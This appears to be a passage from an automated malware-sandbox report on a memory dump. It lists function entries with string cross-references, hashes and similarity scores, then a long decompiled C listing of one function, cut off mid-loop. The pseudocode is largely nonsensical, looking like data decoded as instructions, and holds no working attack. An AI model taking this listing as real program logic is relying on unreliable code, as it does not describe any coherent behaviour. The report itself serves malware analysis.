w, xrefs: 048E35F8
J, xrefs: 048E3EF0
', xrefs: 048E3DDF
=, xrefs: 048E3F4E
p, xrefs: 048E386C

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID: #$'$+$:$=$@$J$l$p$w
API String ID: 0-44647363
Opcode ID: 77aac4cf7bc319346edff5fa925042c5b1227f6c405b5cdc9b2e8d1be5be1c39
Instruction ID: c3d6fe60950a8d45b003f61a5695abb2f988f7d281f2012441439497efc7394c
Opcode Fuzzy Hash: 77aac4cf7bc319346edff5fa925042c5b1227f6c405b5cdc9b2e8d1be5be1c39
Instruction Fuzzy Hash: B3821471C05268CEDB28CFA2C9183FDFAB8BB46749F1095A9C509B7291D7784AC8DF14

Uniqueness

Uniqueness Score: -1.00%

Function 048E33D8, Relevance: 11.7, Strings: 9, Instructions: 494COMMON

Download Yara Rule

Strings

c, xrefs: 048E3D8F
M, xrefs: 048E3786
,, xrefs: 048E383C
V, xrefs: 048E3DEE
r, xrefs: 048E3B68
*, xrefs: 048E4038
s, xrefs: 048E3EC0
d, xrefs: 048E3C3A
w, xrefs: 048E35F8

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID: *$,$M$V$c$d$r$s$w
API String ID: 0-114772015
Opcode ID: 40bbb9495e807a5d9d47da664985a763de3b97c4b57b108cdefff3a56e0140cf
Instruction ID: 587d14b551ed63c6cb72869c8fc1727ed939da1426585b2ab74da82bf862ede4
Opcode Fuzzy Hash: 40bbb9495e807a5d9d47da664985a763de3b97c4b57b108cdefff3a56e0140cf
Instruction Fuzzy Hash: DD321971D05368CEEB28CFA7C9183EDFAB5BB46349F0485E9C509A7291D7780A88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 000BAC81, Relevance: 1.9, Instructions: 1866
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E000BAC81(signed int __eax, signed int* __ebx, void* __ecx, signed char __edx, signed int* __edi, signed int* __esi, void* __fp0) {
				signed char _t713;
				signed int _t717;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed int _t722;
				intOrPtr* _t723;
				intOrPtr* _t724;
				intOrPtr* _t725;
				signed char _t726;
				intOrPtr* _t727;
				signed int _t729;
				signed char _t730;
				signed char _t731;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed int _t737;
				signed int _t738;
				signed char _t739;
				signed int _t740;
				signed char _t741;
				signed char _t742;
				signed int _t743;
				intOrPtr* _t744;
				intOrPtr* _t745;
				intOrPtr* _t746;
				signed char _t747;
				intOrPtr* _t748;
				signed int _t749;
				signed int _t750;
				signed char _t752;
				signed char _t753;
				signed char _t754;
				signed char _t755;
				signed char _t756;
				signed char _t757;
				signed char _t758;
				signed char _t759;
				signed char _t760;
				signed char _t761;
				signed char _t762;
				signed char _t763;
				signed char _t764;
				signed char _t765;
				intOrPtr* _t767;
				intOrPtr* _t768;
				signed int _t769;
				intOrPtr* _t773;
				signed char _t774;
				signed char _t775;
				signed char _t776;
				intOrPtr* _t777;
				signed char _t778;
				signed char _t779;
				signed char _t781;
				signed int _t782;
				signed char _t783;
				signed char _t784;
				signed char _t786;
				signed char _t787;
				signed char _t788;
				signed char _t789;
				signed char _t791;
				signed char _t792;
				signed char _t793;
				signed char _t794;
				signed char _t795;
				signed char _t796;
				signed char _t797;
				signed char _t798;
				signed char _t799;
				signed char _t800;
				intOrPtr* _t802;
				signed char _t803;
				intOrPtr* _t804;
				signed char _t806;
				signed char _t807;
				signed char _t809;
				intOrPtr* _t810;
				signed char _t811;
				signed char _t812;
				intOrPtr* _t813;
				signed char _t815;
				intOrPtr* _t816;
				signed char _t817;
				signed char _t818;
				intOrPtr* _t820;
				intOrPtr* _t821;
				signed char _t1114;
				void* _t1116;
				void* _t1118;
				intOrPtr* _t1119;
				intOrPtr* _t1120;
				intOrPtr* _t1121;
				void* _t1122;
				signed char _t1123;
				signed char _t1125;
				void* _t1127;
				intOrPtr* _t1128;
				void* _t1130;
				intOrPtr* _t1131;
				signed char _t1133;
				void* _t1135;
				signed char _t1136;
				signed char _t1137;
				signed char _t1138;
				signed char _t1139;
				signed char _t1140;
				signed char _t1141;
				signed char _t1143;
				signed char _t1144;
				signed char _t1145;
				signed char _t1146;
				signed char _t1147;
				signed char _t1148;
				signed int _t1149;
				signed int _t1150;
				signed char _t1151;
				signed char _t1152;
				signed char _t1153;
				signed char _t1154;
				signed char _t1155;
				signed char _t1156;
				signed char _t1157;
				signed char _t1158;
				signed char _t1159;
				signed char _t1160;
				signed char _t1161;
				signed char _t1162;
				signed char _t1163;
				signed char _t1165;
				signed int _t1166;
				intOrPtr* _t1167;
				intOrPtr* _t1168;
				signed char _t1169;
				signed char _t1175;
				signed int _t1176;
				signed char _t1177;
				intOrPtr* _t1178;
				signed char _t1179;
				intOrPtr* _t1180;
				signed char _t1181;
				signed int* _t1182;
				signed int* _t1183;
				signed char _t1184;
				char* _t1185;
				signed char _t1186;
				intOrPtr* _t1187;
				void* _t1188;
				intOrPtr* _t1190;
				void* _t1191;
				intOrPtr* _t1193;
				intOrPtr* _t1195;
				void* _t1196;
				signed char _t1213;
				signed char _t1217;
				signed char _t1220;
				signed char _t1223;
				signed char _t1226;
				signed char _t1229;
				void* _t1232;
				signed char _t1233;
				signed char _t1234;
				signed char _t1235;
				signed char _t1236;
				signed char _t1239;
				signed char _t1243;
				signed char _t1245;
				signed char _t1247;
				signed char _t1249;
				void* _t1251;
				char* _t1252;
				void* _t1253;
				signed char _t1479;
				signed char _t1480;
				void* _t1482;
				signed char _t1483;
				signed char _t1487;
				void* _t1491;
				signed char _t1493;
				signed char _t1495;
				signed char _t1496;
				signed char _t1498;
				signed char _t1506;
				signed int* _t1512;
				signed int* _t1513;
				signed int* _t1515;
				signed int* _t1516;
				signed char _t1519;
				signed char _t1520;
				signed char _t1521;
				signed char _t1522;
				signed char _t1540;
				signed int* _t1541;
				void* _t1542;
				void* _t1544;
				intOrPtr* _t1545;
				intOrPtr* _t1546;
				void* _t1547;
				void* _t1577;
				signed int* _t1578;
				signed int* _t1579;
				signed int* _t1581;
				signed int _t1594;
				void* _t1596;
				void* _t1599;
				void* _t1614;
				intOrPtr _t1619;
				void* _t1625;
				void* _t1626;
				void* _t1627;
				void* _t1628;
				signed char _t1634;
				void* _t1660;
				void* _t1661;
				void* _t1662;
				void* _t1663;
				signed char _t1681;
				void* _t1692;
				signed int _t1699;
				signed int _t1707;
				signed char _t1708;
				void* _t1710;
				void* _t1716;
				void* _t1719;
				signed char _t1720;
				void* _t1724;
				signed char _t1725;
				void* _t1727;
				void* _t1734;
				void* _t1741;
				void* _t1745;
				signed int _t1749;
				void* _t1752;
				signed char _t1770;
				intOrPtr* _t1784;
				signed char _t1809;
				void* _t1817;
				void* _t1907;
				void* _t1909;

				_t1907 = __fp0;
				_t1578 = __esi;
				_t1541 = __edi;
				_t1518 = __edx;
				_t1182 = __ebx;
				_t713 = __eax |  *__esi;
				 *_t713 =  *_t713 + __ebx;
				asm("in eax, 0x1");
				 *_t713 =  *_t713 + _t713;
				 *_t713 =  *_t713 + _t713;
				_push(es);
				asm("outsd");
				_t1213 =  *(__ecx + __edi[0x17]) * 0x28167000;
				asm("rol byte [eax], 1");
				 *__edx =  *__edx + _t1213;
				_push(ss);
				 *_t1213 =  *_t1213 + 1;
				_t716 = 0x7209ffeb;
				if(0x7209ffeb < 0) {
					L9:
					 *_t1518 =  *_t1518 + _t1213;
					 *_t716 =  *_t716 + _t716;
					_push(es);
					asm("outsd");
					asm("iretd");
					 *_t716 =  *_t716 + _t716;
					_t717 = _t716 |  *_t1578;
					 *_t717 =  *_t717 + _t1182;
					asm("outsd");
					 *[fs:eax] =  *[fs:eax] + (_t717 ^ 0x02000001);
					_push(es);
					asm("outsd");
					_t719 = 0x720a0000;
					_t1213 =  *(_t1213 +  *[es:edi+0x58]) * 0x28167000;
				} else {
					 *0x720a0000 = 0x720a0000;
					if(0x7209ffeb >= 0) {
						asm("rol dword [eax], 1");
						 *__edx =  *__edx + _t1213;
						 *0x720a0000 =  *0x720a0000 + 0x720a0000;
						asm("outsd");
						asm("iretd");
						 *0x720a0000 =  *0x720a0000 + 0x7209ffeb;
						_t1181 = 0x7209ffeb |  *__esi;
						 *0x720a0000 = __ebx +  *0x720a0000;
						asm("stosd");
						 *0x720a0000 =  *0x720a0000 + 0x720a0000;
						 *__edx =  *__edx + _t1181;
						asm("outsd");
						_t1518 = es;
						 *_t1181 =  *_t1181 + _t1181;
						_push(es);
						asm("outsd");
						_t716 = 0x720a0000;
						_t1213 =  *(_t1213 +  *[es:edi+0x5c]) * 0x28167000;
					}
					_t1176 = _t716 - _t1518;
					 *_t1176 =  *_t1176 + _t1176;
					_t1540 = _t1518 |  *_t1578;
					 *_t1213 =  *_t1213 + 1;
					_t1177 = _t1176 | 0x721d2c09;
					asm("stosb");
					 *_t1177 = _t1177;
					if(_t1177 >= 0) {
						asm("rol dword [eax], 1");
						 *_t1540 =  *_t1540 + _t1213;
						_t1516 = _t1213 +  *[es:edi+0x5a];
						 *_t1177 =  *_t1177 + _t1177;
						_push(es);
						asm("outsd");
						asm("iretd");
						 *_t1177 =  *_t1177 + _t1177;
						_t1179 = _t1177 |  *_t1578;
						 *_t1179 =  *_t1179 + _t1182;
						if( *_t1179 < 0) {
							 *_t1179 =  *_t1179 + _t1179;
						}
						 *_t1540 =  *_t1540 + _t1179;
						asm("outsd");
						_pop(_t1180);
						 *_t1180 =  *_t1180 + _t1180;
						_push(es);
						asm("outsd");
						_t1177 = 0x720a0000;
						_t1213 =  *_t1516 * 0x28167000;
					}
					_t1178 = _t1177 - _t1540;
					 *_t1178 =  *_t1178 + _t1178;
					_t1518 = _t1540 |  *_t1578;
					 *_t1213 =  *_t1213 + 1;
					asm("adc eax, [ecx+edx]");
					_t719 = _t1178 + 0x2c;
					asm("sbb eax, 0x89d072");
					if(_t719 >= 0) {
						asm("rol dword [eax], 1");
						goto L9;
					}
				}
				_t720 = _t719 - _t1518;
				 *_t720 =  *_t720 + _t720;
				_t1519 = _t1518 |  *_t1578;
				 *_t1213 =  *_t1213 + 1;
				_t1614 =  *_t1213;
				do {
					asm("adc eax, [0x1d2c0511]");
				} while (_t1614 < 0);
				 *_t720 = _t720;
				if(_t1614 < 0) {
					L18:
					_t5 = _t720 + 0x13;
					 *_t5 =  *((intOrPtr*)(_t720 + 0x13)) + _t1519;
					_t1619 =  *_t5;
				} else {
					asm("rol dword [eax], 1");
					 *_t1519 =  *_t1519 + _t1213;
					_t1213 = _t1213 +  *[es:edi+0x64];
					 *_t720 =  *_t720 + _t720;
					_push(es);
					asm("outsd");
					asm("iretd");
					 *_t720 =  *_t720 + _t720;
					_t721 = _t720 |  *_t1578;
					 *_t721 =  *_t721 + _t1182;
					asm("stc");
					 *_t721 =  *_t721 + _t721;
					 *_t721 =  *_t721 + _t721;
					_t1182 = _t1182 +  *((intOrPtr*)(_t1182 - 0x64));
					 *_t721 =  *_t721 + _t721;
					_t722 = _t721 + 0x73;
					L16:
					 *_t722 =  *_t722 + _t722;
					_t1519 = _t1519 |  *_t1182;
					_push(es);
					if(_t1519 < 0) {
						L24:
						 *((intOrPtr*)(_t722 + 2)) =  *((intOrPtr*)(_t722 + 2)) + _t1519;
						asm("outsd");
					} else {
						_t720 =  *_t722;
						goto L18;
					}
				}
				L25:
				_pop(_t1578);
				 *_t722 =  *_t722 + _t722;
				_push(es);
				asm("outsd");
				_t722 = 0x6f0a0000;
				asm("aam 0x0");
				 *_t1519 =  *_t1519 + _t1213;
				asm("adc [es:eax], ecx");
				asm("outsd");
				asm("rol dword [eax], cl");
				 *_t1519 =  *_t1519 + _t1213;
				if( *_t1519 < 0) {
					goto L16;
				}
				_push(ss);
				 *0x6F0A0002 =  *((intOrPtr*)(0x6f0a0002)) + _t1519;
				asm("outsd");
				asm("pushad");
				 *0x6f0a0000 =  *0x6f0a0000 + 0x6f0a0000;
				while(1) {
					L27:
					 *_t1578 =  *_t1578 + _t722;
					asm("outsd");
					_t722 = 0x6f0a0000;
					asm("aam 0x0");
					 *_t1519 =  *_t1519 + _t1213;
					asm("adc [es:eax], ecx");
					asm("outsd");
					asm("rol dword [eax], cl");
					 *_t1519 =  *_t1519 + _t1213;
					_t1625 =  *_t1519;
					if(_t1625 < 0) {
						break;
					}
					_t723 =  *0x6f0a0000;
					if(_t1625 >= 0) {
						asm("outsd");
						_pop(_t1599);
					}
					 *_t723 =  *_t723 + _t723;
					_push(es);
					asm("outsd");
					_t722 = 0x6f0a0000;
					asm("aam 0x0");
					 *_t1519 =  *_t1519 + _t1213;
					asm("adc [es:eax], ecx");
					asm("outsd");
					asm("rol dword [eax], cl");
					while(1) {
						 *_t1519 =  *_t1519 + _t1213;
						_t1626 =  *_t1519;
						if(_t1626 < 0) {
							goto L27;
						}
						_t724 =  *_t722;
						if(_t1626 >= 0) {
							asm("outsd");
							_pop(_t1519);
						}
						 *_t724 =  *_t724 + _t724;
						_push(es);
						asm("outsd");
						_t722 = 0x6f0a0000;
						asm("aam 0x0");
						 *_t1519 =  *_t1519 + _t1213;
						asm("adc [es:eax], ecx");
						asm("outsd");
						asm("rol dword [eax], cl");
						 *_t1519 =  *_t1519 + _t1213;
						_t1627 =  *_t1519;
						if(_t1627 < 0) {
							continue;
						}
						_t725 =  *0x6f0a0000;
						if(_t1627 >= 0) {
							asm("outsd");
							_pop(_t725);
						}
						 *_t725 =  *_t725 + _t725;
						_push(es);
						asm("outsd");
						_t726 = 0x6f0a0000;
						asm("aam 0x0");
						do {
							 *0x6f0a0000 =  *0x6f0a0000 + _t726;
							_t726 = _t726 |  *_t1578;
							asm("adc [eax], ecx");
							asm("outsd");
							asm("rol dword [eax], cl");
							 *_t1519 =  *_t1519 + _t1213;
							_t1628 =  *_t1519;
						} while (_t1628 < 0);
						_t727 =  *0x6f0a0000;
						if(_t1628 >= 0) {
							asm("outsd");
							 *[fs:eax] =  *[fs:eax] + 0x6f0a0000;
						}
						 *_t727 =  *_t727 + _t727;
						_push(es);
						asm("outsd");
						asm("aam 0x0");
						 *_t1519 =  *_t1519 + _t1213;
						asm("adc [es:eax], ecx");
						asm("outsd");
						asm("aad 0x0");
						 *_t1519 =  *_t1519 + _t1213;
						asm("adc [es:esi], eax");
						asm("outsd");
						asm("lodsd");
						 *0x6f0a0000 =  *0x6f0a0000 + 0x6f0a0000;
						_t729 = 0x6f0a0000 |  *0x6f0a0000;
						if(_t729 >= 0) {
							_t1169 = _t729 |  *0x6f0a0000;
							do {
								 *((intOrPtr*)(_t1169 + 0x28)) =  *((intOrPtr*)(_t1169 + 0x28)) + _t1519;
								_t1213 =  *_t1515 * 0x28167000;
								asm("rol byte [eax], 1");
								 *_t1519 =  *_t1519 + _t1213;
								_push(ss);
								 *_t1213 =  *_t1213 + 1;
								_t1169 = (0x720a0000 |  *_t1578) - 0x1d;
								_t1634 = _t1169;
							} while (_t1634 < 0);
							asm("adc eax, [eax]");
							if(_t1634 >= 0) {
								asm("rol dword [eax], 1");
								 *_t1519 =  *_t1519 + _t1213;
								_t1213 = _t1213 +  *[es:edi+0x5e];
								 *_t1169 =  *_t1169 + _t1169;
								_push(es);
								asm("outsd");
								asm("iretd");
								 *_t1169 =  *_t1169 + _t1169;
								_t1175 = _t1169 |  *_t1578;
								 *_t1175 =  *_t1175 + _t1182;
								 *_t1175 =  *_t1175 + 0x72000000;
								_t1182[0x1c2dc00] = _t1182[0x1c2dc00] | _t1213;
								_t1182 = _t1182 +  *((intOrPtr*)(_t1182 - 0x63));
								 *_t1175 =  *_t1175 + _t1175;
								_t1169 = _t1175 + 0x73;
								asm("rol byte [eax], cl");
							}
							 *_t1519 =  *_t1519 + _t1213;
							_t729 = _t1169 | 0x00000072;
							 *_t1519 =  *_t1519 - 1;
							 *((intOrPtr*)(_t729 + 0x72)) =  *((intOrPtr*)(_t729 + 0x72)) + _t1519;
							asm("daa");
						}
						_t730 = _t729 |  *_t729;
						if(_t730 >= 0) {
							_pop(ds);
							 *_t730 =  *_t730 & _t1213;
							asm("salc");
							 *_t730 =  *_t730 + _t730;
							_t1213 = _t1213 |  *0x1fe1c09;
							asm("adc eax, [ecx+edx]");
							_t1168 = _t730 + 0x2c;
							_t1182 = _t1182 +  *((intOrPtr*)(_t1182 - 0x63));
							 *_t1168 =  *_t1168 + _t1168;
							_t730 = _t1168 + 0x6f;
							asm("stosd");
						}
						 *_t730 =  *_t730 + _t730;
						_t731 = _t730 |  *_t730;
						 *(_t1541 - 0x2d) =  *(_t1541 - 0x2d) | _t1213;
						 *_t731 =  *_t731 + _t731;
						_t1520 = _t1519 |  *(_t1519 + 5);
						 *((intOrPtr*)(_t731 + 2)) =  *((intOrPtr*)(_t731 + 2)) + _t1520;
						asm("outsd");
						_t1579 = cs;
						 *_t731 =  *_t731 + _t731;
						_push(es);
						asm("outsd");
						asm("aam 0x0");
						 *_t1520 =  *_t1520 + _t1213;
						 *[es:edi-0x2b] =  *[es:edi-0x2b] | _t1213;
						 *0x6f0a0000 =  *0x6f0a0000 + 0x6f0a0000;
						_t733 = 0x6f0a0000 |  *_t1579;
						_t1183 = _t1182 +  *((intOrPtr*)(_t1182 - 0x63));
						 *0x6f0a0000 =  *0x6f0a0000 + _t733;
						_t734 = _t733 + 0x6f;
						asm("lodsd");
						 *0x6f0a0000 =  *0x6f0a0000 + _t734;
						_t735 = _t734 |  *0x6f0a0000;
						if(_t735 >= 0) {
							_t740 = _t735 |  *_t735;
							if(0x6f0a0000 >= 0) {
								asm("rol dword [eax], 1");
								 *_t1520 =  *_t1520 + _t1213;
								_t1513 = _t1213 +  *[es:eax];
								_t1166 =  *_t1513 * 0;
								_push(es);
								 *_t1166 =  *_t1166 + _t1166;
								 *_t1166 =  *_t1166 + _t1166;
								_t1167 = _t1166 -  *_t1166;
								 *_t1167 =  *_t1167 + _t1167;
								asm("adc esi, [eax]");
								_t740 = _t1167 +  *_t1167;
								if(_t740 <= 0) {
									 *_t740 =  *_t740 + _t740;
								}
								 *_t1513 =  *_t1513 + _t740;
								 *_t740 =  *_t740 + _t740;
								asm("adc [eax], eax");
								_t1213 = _t1513 + _t1541[0x13];
								 *_t740 =  *_t740 + _t740;
								_push(es);
								asm("outsd");
								asm("xlatb");
							}
							 *_t740 =  *_t740 + _t740;
							_t1520 = _t1520 |  *(_t1520 - 0x28);
							L58:
							_t1907 = _t1907 +  *_t1541;
							 *((intOrPtr*)(_t740 + 0x16)) =  *((intOrPtr*)(_t740 + 0x16)) + _t1520;
							_t735 = _t740 - _t1520;
							 *_t735 =  *_t735 + _t735;
						}
						_t1521 = _t1520 |  *_t1579;
						 *_t1213 =  *_t1213 + 1;
						_t737 = (_t735 |  *_t1579) - 0x30;
						 *_t737 =  *_t737 + _t737;
						ss = es;
						asm("outsd");
						_t1216 = 0;
						 *_t1521 =  *_t1521;
						 *_t1521 =  *_t1521 + _t737;
						asm("outsd");
						_t1599 = _t1599 - 1;
						 *_t737 =  *_t737 + _t737;
						_push(es);
						if( *_t737 < 0) {
							L69:
							asm("outsd");
							asm("stosd");
							 *_t737 =  *_t737 + _t737;
							goto L70;
						} else {
							_t739 = _t737 |  *_t737;
							if(_t739 >= 0) {
								_pop(_t1183);
								 *_t739 =  *_t739 + _t739;
								_t1165 = _t739 |  *_t739;
								_t1512 = 0 + _t1541[0x17];
								 *_t1165 =  *_t1165 + _t1165;
								_push(es);
								asm("outsd");
								asm("iretd");
								 *_t1165 =  *_t1165 + _t1165;
								_t737 = _t1165 |  *_t1579;
								 *_t737 = _t1183 +  *_t737;
								 *_t1512 =  *_t1512 ^ _t737;
								 *_t737 =  *_t737 + _t737;
								_t1216 = _t1512 + _t1541[0x13];
								 *_t737 =  *_t737 + _t737;
								_push(es);
								asm("outsd");
								asm("xlatb");
								L63:
								 *_t737 =  *_t737 + _t737;
								_t1521 = _t1521 |  *(_t1521 + 0x57);
								_t741 = _t737 |  *_t737;
								if(_t741 < 0) {
									L66:
									 *_t1521 =  *_t1521 + _t1216;
									_t742 = _t741 | 0x00000072;
									_push(_t1183);
									_t737 =  *_t742;
									if(_t742 < 0) {
										L70:
										 *_t1521 =  *_t1521 + _t1216;
										 *_t1216 =  *_t1216 + _t1521;
										_t738 = _t737 + 0x6f;
										L71:
										asm("outsd");
										asm("rol dword [eax], cl");
										 *_t1521 =  *_t1521 + _t1216;
										if( *_t1521 >= 0) {
											_push(cs);
											 *((intOrPtr*)(_t738 + 2)) =  *((intOrPtr*)(_t738 + 2)) + _t1521;
											asm("outsd");
										}
										_pop(_t1579);
										 *_t738 =  *_t738 + _t738;
										_push(es);
										asm("outsd");
										_t739 = 0x6f0a0000;
									} else {
										 *_t737 =  *_t737 | _t1216;
										if( *_t737 >= 0) {
											goto L63;
										} else {
											 *_t737 =  *_t737 + _t737;
											_t1521 = _t1521 |  *_t1183;
											_t737 = _t737 + 8;
											goto L69;
										}
									}
								} else {
									_t743 = _t741 - _t1521;
									 *_t743 =  *_t743 + _t743;
									_t1520 = _t1521 |  *_t1579;
									 *_t1216 =  *_t1216 + 1;
									_t740 = _t743 |  *_t1541;
									 *_t740 =  *_t740 + _t740;
									 *_t1520 =  *_t1520 + _t740;
									if( *_t1520 != 0) {
										goto L58;
									} else {
										L65:
										 *_t740 =  *_t740 + _t740;
										_t741 = _t740 + 0x73;
										goto L66;
									}
								}
							}
						}
						_t1216 = _t1216 |  *(_t1541 - 0x2c);
						 *_t739 =  *_t739 + _t739;
						_t740 = _t739 |  *_t1579;
						asm("adc [edi+ebp*2], eax");
						asm("rol dword [eax], cl");
						 *_t1521 =  *_t1521 + _t1216;
						if( *_t1521 < 0) {
							goto L65;
						}
						_push(ss);
						 *((intOrPtr*)(_t740 + 2)) =  *((intOrPtr*)(_t740 + 2)) + _t1521;
						asm("outsd");
						asm("pushad");
						 *_t740 =  *_t740 + _t740;
						while(1) {
							L76:
							 *_t1579 =  *_t1579 + _t740;
							asm("outsd");
							_t738 = 0x6f0a0000;
							asm("aam 0x0");
							 *_t1521 =  *_t1521 + _t1216;
							asm("adc [es:edi+ebp*2], eax");
							asm("rol dword [eax], cl");
							 *_t1521 =  *_t1521 + _t1216;
							_t1660 =  *_t1521;
							if(_t1660 < 0) {
								goto L71;
							}
							_t744 =  *0x6f0a0000;
							if(_t1660 >= 0) {
								asm("outsd");
								_pop(_t1599);
							}
							 *_t744 =  *_t744 + _t744;
							_push(es);
							asm("outsd");
							_t740 = 0x6f0a0000;
							asm("aam 0x0");
							 *_t1521 =  *_t1521 + _t1216;
							asm("adc [es:edi+ebp*2], eax");
							asm("rol dword [eax], cl");
							while(1) {
								 *_t1521 =  *_t1521 + _t1216;
								_t1661 =  *_t1521;
								if(_t1661 < 0) {
									goto L76;
								}
								_t745 =  *_t740;
								if(_t1661 >= 0) {
									asm("outsd");
									_pop(_t1521);
								}
								 *_t745 =  *_t745 + _t745;
								_push(es);
								asm("outsd");
								_t740 = 0x6f0a0000;
								asm("aam 0x0");
								 *_t1521 =  *_t1521 + _t1216;
								asm("adc [es:edi+ebp*2], eax");
								asm("rol dword [eax], cl");
								 *_t1521 =  *_t1521 + _t1216;
								_t1662 =  *_t1521;
								if(_t1662 < 0) {
									continue;
								}
								_t746 =  *0x6f0a0000;
								if(_t1662 >= 0) {
									asm("outsd");
									_pop(_t746);
								}
								 *_t746 =  *_t746 + _t746;
								_push(es);
								asm("outsd");
								_t747 = 0x6f0a0000;
								asm("aam 0x0");
								do {
									 *0x6f0a0000 =  *0x6f0a0000 + _t747;
									_t747 = _t747 |  *_t1579;
									asm("adc [edi+ebp*2], eax");
									asm("rol dword [eax], cl");
									 *_t1521 =  *_t1521 + _t1216;
									_t1663 =  *_t1521;
								} while (_t1663 < 0);
								_t748 =  *0x6f0a0000;
								if(_t1663 >= 0) {
									asm("outsd");
									 *[fs:eax] =  *[fs:eax] + 0x6f0a0000;
								}
								 *_t748 =  *_t748 + _t748;
								_push(es);
								asm("outsd");
								while(1) {
									L91:
									_t749 = 0x6f0a0000;
									asm("aam 0x0");
									 *_t1521 =  *_t1521 + _t1216;
									asm("adc [es:edi+ebp*2], eax");
									asm("aad 0x0");
									 *_t1521 =  *_t1521 + _t1216;
									while(1) {
										 *[es:edi-0x53] =  *[es:edi-0x53] | _t1216;
										 *_t749 =  *_t749 + _t749;
										_t750 = _t749 |  *_t749;
										if(_t750 < 0) {
											goto L91;
										}
										_t749 = _t750 |  *_t750;
										if(_t749 >= 0) {
											asm("rol dword [eax], 1");
											 *_t1521 =  *_t1521 + _t1216;
											 *_t749 =  *_t749 + _t749;
											_push(es);
											_push(ss);
											asm("outsd");
											_t1216 = 0;
											 *_t1521 =  *_t1521;
											 *_t1521 =  *_t1521 + _t749;
											asm("outsd");
											_t1599 = _t1599 - 1;
											 *_t749 =  *_t749 + _t749;
											_push(es);
											if( *_t749 < 0) {
												continue;
											} else {
												_pop(es);
												 *((intOrPtr*)(_t749 + 0x6f)) =  *((intOrPtr*)(_t749 + 0x6f)) + _t1521;
												_pop(_t1183);
												 *_t749 =  *_t749 + _t749;
												_t1216 = 0 +  *(_t749 |  *_t749);
												_t749 =  *_t1216 * 0;
											}
										}
										_push(es);
										 *_t749 =  *_t749 + _t749;
										asm("adc esi, [eax]");
										_t752 = _t749 -  *_t749;
										asm("in eax, 0x0");
										 *_t752 =  *_t752 + _t752;
										_t753 = _t752 &  *_t752;
										 *_t1216 =  *_t1216 + _t1521;
										 *_t1521 =  *_t1521 + _t753;
										asm("outsd");
										 *_t753 =  *_t753 + _t753;
										asm("outsd");
										 *_t1521 =  *_t1521 + _t1216;
										asm("outsd");
										_t1909 =  *_t753;
										 *_t1521 =  *_t1521 + _t1216;
										_t754 = _t753 |  *_t1521;
										asm("outsd");
										_t1581 = es;
										 *_t754 =  *_t754 + _t754;
										_push(es);
										_t1217 = _t1216 + _t1541[0x11];
										 *_t754 =  *_t754 + _t754;
										_push(es);
										_push(ss);
										_push(es);
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1217;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1217;
										_t755 = _t754 - _t1183;
										 *_t755 =  *_t755 + _t755;
										 *_t755 =  *_t755 + _t755;
										_t756 = _t755 |  *_t755;
										 *_t756 =  *_t756 + _t756;
										_push(es);
										_t1220 = (_t1217 |  *(_t1541 - 0x32)) + _t1541[0x18] + _t1541[0x11];
										 *_t756 =  *_t756 + _t756;
										ss = es;
										_push(es);
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1220;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1220;
										_t757 = _t756 - _t1183;
										 *_t757 =  *_t757 + _t757;
										 *_t757 =  *_t757 + _t757;
										_t758 = _t757 |  *_t757;
										 *_t758 =  *_t758 + _t758;
										_push(es);
										_t1223 = (_t1220 |  *(_t1541 - 0x32)) + _t1541[0x17] + _t1541[0x11];
										 *_t758 =  *_t758 + _t758;
										_push(es);
										asm("sbb [esi], al");
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1223;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1223;
										_t759 = _t758 - _t1183;
										 *_t759 =  *_t759 + _t759;
										 *_t759 =  *_t759 + _t759;
										_t760 = _t759 |  *_t759;
										 *_t760 =  *_t760 + _t760;
										_push(es);
										_t1226 = (_t1223 |  *(_t1541 - 0x32)) + _t1541[0x16] + _t1541[0x11];
										 *_t760 =  *_t760 + _t760;
										_push(es);
										asm("sbb [esi], eax");
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1226;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1226;
										_t761 = _t760 - _t1183;
										 *_t761 =  *_t761 + _t761;
										 *_t761 =  *_t761 + _t761;
										_t762 = _t761 |  *_t761;
										 *_t762 =  *_t762 + _t762;
										_push(es);
										_t1229 = (_t1226 |  *(_t1541 - 0x32)) + _t1541[0x16] + _t1541[0x11];
										 *_t762 =  *_t762 + _t762;
										_push(es);
										asm("sbb al, [esi]");
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1229;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1229;
										_t763 = _t762 - _t1183;
										 *_t763 =  *_t763 + _t763;
										 *_t763 =  *_t763 + _t763;
										_t764 = _t763 |  *_t763;
										 *_t764 =  *_t764 + _t764;
										_push(es);
										_t1232 = (_t1229 |  *(_t1541 - 0x32)) + _t1541[0x19] + _t1541[0x11];
										 *_t764 =  *_t764 + _t764;
										_push(es);
										asm("sbb eax, [esi]");
										asm("outsd");
										asm("fiadd dword [eax]");
										 *_t1521 =  *_t1521 + _t1232;
										asm("outsd");
										asm("fild dword [eax]");
										 *_t1521 =  *_t1521 + _t1232;
										_t765 = _t764 - _t1183;
										 *_t765 =  *_t765 + _t765;
										while(1) {
											 *_t1521 =  *_t1521 + _t1232;
											asm("outsd");
											asm("into");
											 *_t765 =  *_t765 + _t765;
											_t767 = (_t765 |  *_t765) -  *(_t765 |  *_t765);
											 *_t767 =  *_t767 + _t767;
											asm("adc esi, [eax]");
											_t768 = _t767 +  *_t767;
											_t1233 = _t1232 - 1;
											 *_t768 =  *_t768 + _t768;
											 *_t768 =  *_t768 + _t768;
											 *_t768 =  *_t768 + _t768;
											 *_t1521 =  *_t1521 + _t768;
